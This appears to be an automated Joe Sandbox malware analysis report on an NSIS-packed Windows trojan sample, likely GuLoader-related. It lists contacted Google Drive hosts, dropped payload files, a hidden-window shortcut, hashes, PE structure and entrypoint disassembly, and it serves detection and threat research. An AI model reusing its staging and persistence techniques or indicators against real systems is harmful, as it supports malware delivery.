                              https://drive.usercontent.google.com/VfTSt7dc60O.exe, 00000008.00000003.1710476317.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1569872660.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1674629095.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1580893533.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1627045021.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1686747969.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1502459793.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767155103.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1721714871.000000000721F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.186.161
                                		drive.usercontent.google.comUnited States
                                		15169GOOGLEUSfalse
                                172.217.18.14
                                		drive.google.comUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1587610
                                Start date and time:2025-01-10 15:37:46 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 45s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:fTSt7dc60O.exe
                                renamed because original name is a hash value
                                Original Sample Name:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
                                Detection:MAL
                                Classification:mal68.troj.evad.winEXE@3/10@2/2
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 90%
                                • Number of executed functions: 48
                                • Number of non-executed functions: 76
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target fTSt7dc60O.exe, PID 4640 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:36:40API Interceptor43x Sleep call for process: fTSt7dc60O.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                37f463bf4616ecd445d4a1937da06e19nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                • 142.250.186.161
                                • 172.217.18.14
                                n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
                                • 142.250.186.161
                                • 172.217.18.14

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dllME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                  09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                    TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                      ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                        09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                          TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                            Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                                  debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):45
                                                    Entropy (8bit):4.7748605961854445
                                                    Encrypted:false
                                                    SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                    MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                    SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                    SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                    SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                    C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.656006343879828
                                                    Encrypted:false
                                                    SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                    MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                    SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                    SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                    SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                    • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                    • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                    • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                    Reputation:moderate, very likely benign file
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\nsd9394.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1217498
                                                    Entropy (8bit):3.427451882823274
                                                    Encrypted:false
                                                    SSDEEP:6144:fP7xZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/Oi9g9p0AJ2aJ4aKh:fP7x2y91u9vJCQC/QTdS48XoPh
                                                    MD5:1AFBA10167DB501871718FBB45009140
                                                    SHA1:A299CE179AEA09CB1A26E3CC024CC4CEC13A8C45
                                                    SHA-256:C778E9D379CCF47CCF6BC317BE52D78BDCDE1FB9CC7D5718D3EAD96EA46D46AC
                                                    SHA-512:44C9E6396620CEA8DF3EA340B408DA126007B4AE162CC5F37C2C763FE3F010F3A58DC1761255ED74501FF45A7D6A9ACB43091B9A0ACB0E719C2C51B9867B76A2
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:r.......,...................[...................r...........................................................................................................................................................................................................................................G...J...........k...j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\tmc.ini

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):28
                                                    Entropy (8bit):4.110577243331642
                                                    Encrypted:false
                                                    SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                    MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                    SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                    SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                    SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:[Access]..Setting=Disabled..

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Contiguousness.Rit

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):309738
                                                    Entropy (8bit):7.516382939689266
                                                    Encrypted:false
                                                    SSDEEP:6144:yZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/O9:y2y91u9vJCQC/QTdS489
                                                    MD5:C2E2BE2ACF5991EC7009DDC5D8B361DF
                                                    SHA1:FC1C8390F2BA0E997B7AD4AD30CFBBF1B181B695
                                                    SHA-256:E3738968906D3EDADA7CD870CCEB2882FED2FEFA0610B8AE063E9F8457F2A118
                                                    SHA-512:5C103560D7948C5208C54401E2C20B1066D8DE27F63BBD73FCA28DD52AA44780B8F8F9A02D1F0039F0792630E1CE99B3BF09ADE271540543D95D63ABABDDC7B4
                                                    Malicious:false
                                                    Preview:...OOO.~...RRR.............FFF......FF.vv................VV...........s..............DDD.............99......__....``...................ww.t....7.{..%%.Q.....``.......................>...........UU..........[..PPPPPP.......=====...EE.Y.p......................k....ooo..............................Q.................%%................................P................_.h.......a.. .<.....a........\.......KKKK.....,..55..................'.......................#..........H....hhh.............ss.g.nn.JJJ..............#.........222..........[[[................C..................................N.q...q.........,,,,,............^..........W......z...p.......................9........................,,,,,,.0..KK.......^^....................NN....................@@@@.@@.&&.LL....!!!..............EEE............2222.........``....0.......YY.'.!............................#..................xx.........C.9.....................<<<........//...,....,,........E....99............HH.....................mm

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Havrnes117.For

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):27357
                                                    Entropy (8bit):4.575459332843998
                                                    Encrypted:false
                                                    SSDEEP:768:67lqhYoAunEaZqOMl7D28MUQ7iM5DFTmD:6M2oznsJn0UQ7/5DFK
                                                    MD5:91B75B6174DE619A40B45FB2247B3AFD
                                                    SHA1:F9126CD2CC8244372E46F31C81C46932E083EE2F
                                                    SHA-256:EA87B1D2A30A008F82A07E61A71B936521D74FC0818AAA7E364CC99A2198608C
                                                    SHA-512:41BDD3F1941B419184E685A548E97AAFDFFE411D122176F5AD931CCB933CD4A8A784F842DE1A46BF4082222968A5679F8A6B92C74E6BE26BE3BE0B20C56F84E4
                                                    Malicious:false
                                                    Preview:............**......ZZ......... ..x.........f........````.....................}}}....~.Y....ff.............._.............~~~.ZZZ................qqq............S......IIII......................i......U.......................pppp..............CCC.......PP...^......[..................... ...//............cc..........._.K.........00.......,,,,,,,,,,..............333.......zz....I..............8..u..........11.............................F......... .....--...........EEE.................F.666.............................................HH.............]....|.....................;;;...........tttt..............XX..................Q........OOOOO.............LL...nn....XX.....X.......dd..............I.r..............MM...................8........<<.P.........._.q....))......::.H...'.................................>>>>>..............T..............].......{{...NNN...............9.....SSS.......(.pp.......................Y..3.................00....PP..<.......bb.................%%%%.r......d...

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Impieties200.bjr

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):207998
                                                    Entropy (8bit):1.2479248406208852
                                                    Encrypted:false
                                                    SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                    MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                    SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                    SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                    SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                    Malicious:false
                                                    Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\firsaarsfdselsdags.luv

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):443489
                                                    Entropy (8bit):1.2463028275519636
                                                    Encrypted:false
                                                    SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                    MD5:913964ACDFFFA24344A401D48E08C653
                                                    SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                    SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                    SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                    Malicious:false
                                                    Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\portitor.win

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):209062
                                                    Entropy (8bit):1.2469617066336303
                                                    Encrypted:false
                                                    SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                    MD5:607886D87859E45164D2959809AB5367
                                                    SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                    SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                    SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                    Malicious:false
                                                    Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..

                                                    C:\Users\user\subacidity.lnk

                                                    Download File
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                    Category:dropped
                                                    Size (bytes):900
                                                    Entropy (8bit):3.5128877462339747
                                                    Encrypted:false
                                                    SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRJNSkXg1MJsW+slmYalzJCN85v4U:8QudO/9Q6jd9a6Ooy3Nr24qy
                                                    MD5:95B268D3221CF11045F707181993954F
                                                    SHA1:DCBB6EFFDF3201BA96B6BCCF45988D9B91F05440
                                                    SHA-256:E132240D5DD1D9A30CC74BF95A5560896E1257335665CE86B7089F21FDFA208D
                                                    SHA-512:E3302FAAB83F85D601BDD7309078784F66B591B4F8C1DE0A3F0C7159174F4EE45CD9CBB0A96D2C7D8D49ACB291B7ADE50CECDED943BCE865C2D82D80FFE51A5F
                                                    Malicious:false
                                                    Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.J.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.887380640693706
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:fTSt7dc60O.exe
                                                    File size:540'745 bytes
                                                    MD5:0eecc852b848039da55141fb43dd01e2
                                                    SHA1:9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
                                                    SHA256:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
                                                    SHA512:74bb690253ce11bc69e783b1b12561678fb71470f42ee15a5280719503bfe6866693973e52022c26cb2a08616d53a7eeb2973c3763aeb1c9618c7cdf1529a5b5
                                                    SSDEEP:12288:XRV78GLIlIYtQ5viB2XZptlrmp/jcnVCyd0ZjfMjhixmCGs7:IplJtQ5aBsl2jQoyd0Zj0sxzGs7
                                                    TLSH:01B42304BCC2EC1EC58A5DF14BB6C6BAB17AFE26691025876F713E5F2C60BC1407D286
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@

                                                    File Icon

                                                    Icon Hash:0714262e34390f06

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x40335a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                    Entrypoint Preview

                                                    Instruction
                                                    sub esp, 000002D8h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+18h], ebp
                                                    mov dword ptr [esp+10h], 00409230h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [00407034h]
                                                    push 00008001h
                                                    call dword ptr [004070BCh]
                                                    push ebp
                                                    call dword ptr [004072ACh]
                                                    push 00000009h
                                                    mov dword ptr [004292B8h], eax
                                                    call 00007FF0147C642Ah
                                                    mov dword ptr [00429204h], eax
                                                    push ebp
                                                    lea eax, dword ptr [esp+38h]
                                                    push 000002B4h
                                                    push eax
                                                    push ebp
                                                    push 004206A8h
                                                    call dword ptr [0040717Ch]
                                                    push 0040937Ch
                                                    push 00428200h
                                                    call 00007FF0147C6095h
                                                    call dword ptr [00407134h]
                                                    mov ebx, 00434000h
                                                    push eax
                                                    push ebx
                                                    call 00007FF0147C6083h
                                                    push ebp
                                                    call dword ptr [0040710Ch]
                                                    push 00000022h
                                                    mov dword ptr [00429200h], eax
                                                    pop edi
                                                    mov eax, ebx
                                                    cmp word ptr [00434000h], di
                                                    jne 00007FF0147C3519h
                                                    mov esi, edi
                                                    mov eax, 00434002h
                                                    push esi
                                                    push eax
                                                    call 00007FF0147C5AD3h
                                                    push eax
                                                    call dword ptr [00407240h]
                                                    mov ecx, eax
                                                    mov dword ptr [esp+1Ch], ecx
                                                    jmp 00007FF0147C360Bh
                                                    push 00000020h
                                                    pop edx
                                                    cmp ax, dx
                                                    jne 00007FF0147C3519h
                                                    inc ecx
                                                    inc ecx
                                                    cmp word ptr [ecx], dx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x132d8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x4a0000x132d80x134006a5bbc33287fc34c026c3652aab40ca4False0.7685800527597403data6.977243320980138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x4a4480xb1b3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923501351915763
                                                    RT_ICON0x556000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4311203319502075
                                                    RT_ICON0x57ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48053470919324576
                                                    RT_ICON0x58c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5330490405117271
                                                    RT_ICON0x59af80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5647540983606557
                                                    RT_ICON0x5a4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6353790613718412
                                                    RT_ICON0x5ad280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5961981566820277
                                                    RT_ICON0x5b3f00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3176829268292683
                                                    RT_ICON0x5ba580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.42124277456647397
                                                    RT_ICON0x5bfc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                                                    RT_ICON0x5c4280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
